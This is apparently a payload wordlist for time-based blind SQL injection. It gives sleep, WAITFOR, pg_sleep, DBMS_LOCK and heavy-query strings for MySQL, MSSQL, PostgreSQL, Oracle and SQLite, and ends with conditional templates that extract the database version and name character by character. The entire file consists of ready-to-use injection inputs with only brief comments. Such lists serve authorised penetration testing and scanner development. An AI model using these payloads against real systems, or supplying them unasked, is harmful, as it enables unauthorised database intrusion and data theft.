# Time-based (Blind) SQL Injection Payloads
# These payloads cause delays to detect blind SQLi

# MySQL SLEEP
' OR SLEEP(5)--
" OR SLEEP(5)--
' OR SLEEP(5)#
') OR SLEEP(5)--
')) OR SLEEP(5)--
' AND SLEEP(5)--
' AND SLEEP(5) AND '1'='1
1' AND SLEEP(5)--
1 AND SLEEP(5)
' OR (SELECT SLEEP(5))--
' OR (SELECT * FROM (SELECT SLEEP(5))a)--
' UNION SELECT SLEEP(5)--
' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--
'; SELECT SLEEP(5);--

# MySQL BENCHMARK (alternative)
' OR BENCHMARK(10000000,SHA1('test'))--
' AND BENCHMARK(10000000,MD5('test'))--

# MSSQL WAITFOR
'; WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5';--
'; WAITFOR TIME '00:00:05'--
' AND 1=1; WAITFOR DELAY '0:0:5'--
' OR 1=1; WAITFOR DELAY '0:0:5'--
'); WAITFOR DELAY '0:0:5'--
1; WAITFOR DELAY '0:0:5'--

# PostgreSQL pg_sleep
' OR pg_sleep(5)--
' AND pg_sleep(5)--
'; SELECT pg_sleep(5);--
' || pg_sleep(5)--
') OR pg_sleep(5)--
1; SELECT pg_sleep(5);--
' AND 1=1; SELECT pg_sleep(5);--

# Oracle DBMS_LOCK.SLEEP
' OR DBMS_LOCK.SLEEP(5)--
' AND DBMS_LOCK.SLEEP(5)--
'; BEGIN DBMS_LOCK.SLEEP(5); END;--
' AND 1=1 AND DBMS_LOCK.SLEEP(5)--

# Oracle alternative (heavy query)
' OR (SELECT COUNT(*) FROM ALL_USERS t1,ALL_USERS t2,ALL_USERS t3)>0--

# SQLite (no native sleep, use heavy operations)
' OR (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000)))))--

# Conditional delays (more precise)
' AND IF(1=1,SLEEP(5),0)--
' AND IF(1=2,SLEEP(5),0)--
' AND (SELECT IF(1=1,SLEEP(5),0))--
' OR IF(1=1,SLEEP(5),0)--
' AND CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END--

# Stacked with delay
'; SELECT SLEEP(5);--
'; SELECT pg_sleep(5);--

# Time with data extraction (template)
' AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--
' AND IF(ASCII(SUBSTRING(database(),1,1))>96,SLEEP(5),0)--

